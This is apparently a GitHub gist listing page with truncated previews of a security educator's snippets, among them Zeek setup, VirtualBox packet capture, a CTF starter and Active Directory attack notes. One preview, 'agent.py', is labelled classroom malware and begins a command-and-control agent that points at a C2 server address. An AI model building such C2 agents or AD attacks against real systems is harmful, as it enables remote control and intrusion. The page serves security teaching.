Skip to content

Instantly share code, notes, and snippets.

View ShyftXero's full-sized avatar

Eli McRae ShyftXero

View GitHub Profile
# 20240215
# shyft
# script to prove my wife wrong about how much time I'm spending at my computer in the eventing.
# use with caution... may not be worth it to you...
# relies on https://github.com/ActivityWatch/activitywatch/ "Records what you do so that you can know how you've spent your time."
# grown from https://github.com/ActivityWatch/aw-client/blob/master/examples/time_spent_today.py
import sys
from datetime import date, datetime, time, timedelta, timezone
from rich import print
import socket
@ShyftXero
ShyftXero / .nanorc
Last active August 20, 2023 18:35
A good nanorc file
# Options
set tabsize 4
set tabstospaces
set indicator # side-bar for indicating cur position
set linenumbers
#set numbercolor green,normal
#set suspendable # allow nano be suspended
set smarthome # home jumps to line start first
set zap # delete selected text as a whole
@ShyftXero
ShyftXero / install_zeek.sh
Last active February 15, 2022 17:27
install latest zeek nsm repo on kali 2020.1 (Debian Testing)
sudo ls
if test $(lsb_release -c | grep -o kali); then
echo on kali;
echo 'deb http://download.opensuse.org/repositories/security:/zeek/Debian_Testing/ /' |sudo tee -a /etc/apt/sources.list.d/security:zeek.list;
wget -nv https://download.opensuse.org/repositories/security:zeek/Debian_Testing/Release.key -O Release.key;
else
echo not on kali;
# For ubuntu base system rather than Debian
echo 'deb http://download.opensuse.org/repositories/security:/zeek/xUbuntu_21.10/ /' |sudo tee -a /etc/apt/sources.list.d/security:zeek.list;
@ShyftXero
ShyftXero / Active Directory Attacks.md
Created January 30, 2022 14:06 — forked from ssstonebraker/Active Directory Attacks.md
Active Directory Attacks #oscp
@ShyftXero
ShyftXero / gifcreator.py
Created December 15, 2021 21:17 — forked from achillean/gifcreator.py
Create GIFs from a Shodan json.gz file using the API
#!/usr/bin/env python
# Dependencies:
# - arrow
# - shodan
# - ImageMagick
#
# Installation:
# sudo easy_install arrow shodan
# sudo apt-get install imagemagick
#
@ShyftXero
ShyftXero / agent.py
Created July 15, 2021 22:42
ACS - our malware from adv cybersecurity PD on 15JUL21
# pip3 install -U requests
import requests
import time
import subprocess
C2_SERVER = 'http://10.0.2.15:5000/' # our kali machines IP address
def get_ext_ip():
response = requests.get('https://ifconfig.me/all.json')
# some_bucket = "Eli"
# list_of_people = [ some_bucket, "Thomas Jefferson", "wallace and grommit" ]
# print(list_of_people) ### puts on screen
# list_of_servers = [
# "webserver 1",
# "databaseserver 3",
# "ftp_server",
import os
from time import sleep
# try:
# my_animals_file = open('other_animals.txt', 'r')
# for line in my_animals_file.readlines():
# print(line.strip() )
# my_animals_file.close()yword found in text

Super slick commands for virutalbox machine management

Start / Stop a pcap at the VM level for a guest machine. (not having to route traffic through another box to capture; works in NAT)

  • Start pcap
    • vboxmanage controlvm "vm_name_here" nictrace1 on
  • Stop pcap
    • vboxmanage controlvm "vm_name_here" nictrace1 off

A file VBox-<5_hex_digits>.pcap will be created. don't know the significance of the digits. They don't seem to be the mac

@ShyftXero
ShyftXero / leaky_flag.py
Last active April 13, 2021 16:33
leaky starter code
import requests
import bs4
# you are searching for a message that starts with 'FLAG{' and ends in '}'
url = 'https://leaky.shyft.us'
sess = requests.session()
ab = [chr(x) for x in range(0, 255) if chr(x).isprintable()]
print(ab)